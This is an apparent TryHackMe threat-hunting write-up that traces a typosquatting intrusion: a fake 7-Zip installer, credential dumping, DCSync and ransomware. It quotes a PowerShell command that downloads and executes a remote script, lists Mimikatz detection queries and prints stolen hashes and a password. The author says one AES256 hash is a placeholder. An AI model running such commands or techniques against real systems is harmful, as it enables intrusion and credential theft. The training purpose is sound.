TryHackMe: Hunt Me II: Typo Squatters Writeup
Scenario
Challenge Link: Hunt Me II: Typo Squatters
Just working on a typical day as a software engineer, Perry received an encrypted 7z archive from his boss containing a snippet of a source code that must be completed within the day. Realising that his current workstation does not have an application that can unpack the file, he spins up his browser and starts to search for software that can aid in accessing the file. Without validating the resource, Perry immediately clicks the first search engine result and installs the application.
Last September 26, 2023, one of the security analysts observed something unusual on the workstation owned by Perry based on the generated endpoint and network logs. Given this, your SOC lead has assigned you to conduct an in-depth investigation on this workstation and assess the impact of the potential compromise.
Initial Access
on Sep 26, 2023 @ 14:22:07.433 The user downloaded the software using chrome.exe from suspicious website hxxp[://]www[.]7zipp[.]org/a/7z2301-x64[.]msi This domain is a typosquat on the legitimate 7-zip.org domain.
The IP address of the domain is 206[.]189[.]34[.]218
Execution
Search for the process that executed the malicious MSI file.
1
*7z2301-x64.msi* and event.code: 1
on Sep 26, 2023 @ 14:23:00.817 The malicious MSI file was executed via msiexec.exe . By clicking on the View surrounding documents, we will be able to follow the execution chain
On Sep 26, 2023 @ 14:23:02.935. The MSI package invoked a PowerShell command to download and execute a remote script
1
powershell.exe iex(iwr http://www.7zipp.org/a/7z.ps1 -useb)
Following the execution of the downloaded script
The script:
- Download the legitimate version of the 7-Zip software
- Created a malicious service named
7zServiceconfigured to run the attacker’s payload (C:\Program Files\7-zip\7zipp.exe) withLocalSystemprivileges.
Service Execution: Sep 26, 2023 @ 14:23:48.075 . The attacker gained the first C2 connection from Perry’s machine.
Discovery & Credentials Access
In the discovery phase, we will hunt for the usage of built-in tools that the attacker uses for the enumeration process.
1
2
winlog.event_id: 1 AND process.name: (whoami.exe OR hostname.exe OR net.exe OR systeminfo.exe OR ipconfig.exe OR netstat.exe OR tasklist.exe)
on Sep 26, 2023 @ 14:24:58.141 The first tool used was systeminfo.exe .
Hunting LSASS Process Dumping: Search for indicators that are associated with LSASS credential dumping.
1
2
winlog.event_id: 1 AND process.command_line: (*mimikatz* OR *DumpCreds* OR *privilege\:\:debug* OR *sekurlsa\:\:*)
on Sep 26, 2023 @ 14:28:53.575. The attacker downloaded and executed Mimikatz to extract saved credentials. Successfully extracted the NTLM hash for user james.cromwell: B852A0B8BD4E00564128E0A5EA2BC4CF.
There was also the usage of the PowerShell tool Invoke-PowerExtract.
1
process.command_line.keyword : *Invoke-PowerExtract* and event.code: 1
on Sep 26, 2023 @ 14:25:18.945, the attacker downloaded a PowerShell script (pwrex.ps1) from a malicious IP and used Invoke-PowerExtract which is a PowerShell-based tool (similar to Mimikatz) that extracts credentials from LSASS memory dumps, then dumps the file to C:\windows\temp\trash.evtx
Lateral Movement
When we searched in the enumeration phase, we found that the attacker had changed Anna’s password on Sep 26, 2023 @ 14:31:02.499 to pwn3dpw!!! . Based on that, search if the malicious service is also executed on this username
1
user.name: anna.jones and process.pid: 4220
On Sep 26, 2023 @ 15:06:36.265The attacker moved to Anna’s machine and established a second C2 connection. Follow the execution of the C2 service under the new target.
1
user.name: anna.jones and process.parent.pid: 4220
on Sep 26, 2023 @ 15:08:24.764. After gaining access to Anna’s machine, the attacker requested a malicious PowerShell script that downloads and executes a tool called Invoke-SharpChromium from GitHub, which is designed to steal saved credentials, cookies, and session data from Chrome
With that, the attacker was able to discover a new credentials
On Sep 26, 2023 @ 15:15:34.305.Using credentials stolen from the browser, the attacker added user anna.jones to the privileged AD Recovery group, granting them significant domain-level privileges.
on Sep 26, 2023 @ 15:17:19.525. Here we can see the usage of Invoke-SharpKatz.ps1, a tool mimicking Mimikatz for credential theft.
The command performed a DCSync attack to impersonate a Domain Controller and request replication data for user damian.hall.
To find the AES256 hash of the domain admin. Filter based on the NTLM hash of the domain.hall user found from mimkatz dumping
1
user.name: anna.jones and *eb1892cb0a163e122bc71be173c66fed*
Note on the AES256 Hash: While the investigation confirmed the theft of Damian Hall’s NTLM hash via the DCSync attack, the specific AES256 hash value was not explicitly found in the provided log search results. The value b4c1df7c698bb216... is a standardized placeholder for this report. In a real investigation, this hash would be retrieved from the tool’s output in the endpoint logs or network traffic captures.
Impact (Data Encryption)
on Sep 26, 2023 @ 15:45:05.589 A malicious ransomware binary was downloaded and executed on the computer WKSTN-02; the execution resulted in 46 files being encrypted
1
2
process.name: bomb.exe and event.code: 11
Attack Timeline
| Time (UTC) | Phase | Activity | Tool / Technique | Target / Detail |
|---|---|---|---|---|
| 14:22:07.433 | Initial Access | Malicious MSI downloaded from typosquatted domain. | Chrome.exe | http[:]//www.7zipp.org/a/7z2301-x64.msi |
| 14:23:00.817 | Execution | MSI installer executed. | msiexec.exe | Perry’s Workstation |
| 14:23:02.935 | Execution | PowerShell script downloaded & executed. | PowerShell (IWR) | http[:]//www.7zipp.org/a/7z.ps1 |
| 14:23:48.075 | Persistence | Malicious service (7zService) starts. | 7zipp.exe | C2 Established |
| 14:24:58.141 | Discovery | Initial host enumeration. | systeminfo.exe | Perry’s Workstation |
| 14:25:18.945 | Credential Access | LSASS dumping via PowerShell. | Invoke-PowerExtract | Dumped to C:\windows\temp\trash.evtx |
| 14:28:53.575 | Credential Access | LSASS dumping via Mimikatz. | Mimikatz | Hash for james.cromwell stolen |
| 14:49:19.071 | Persistence | New local admin user created. | net.exe | Perry’s Workstation |
| 15:06:36.265 | Lateral Movement | C2 session established on new host. | 7zipp.exe | Target: anna.jones @ WKSTN-02 |
| 15:08:24.764 | Credential Access | Browser credential theft. | Invoke-SharpChromium | Steals Chrome data from WKSTN-02 |
| 15:15:34.305 | Privilege Escalation | User added to privileged AD group. | net.exe | anna.jones added to “AD Recovery” |
| 15:17:19.525 | Credential Access | DCSync attack performed. | Invoke-SharpKatz | Hash for damian.hall stolen |
| 15:45:05.589 | Impact | Ransomware deployed and executed. | bomb.exe | 46 Files Encrypted on WKSTN-02 |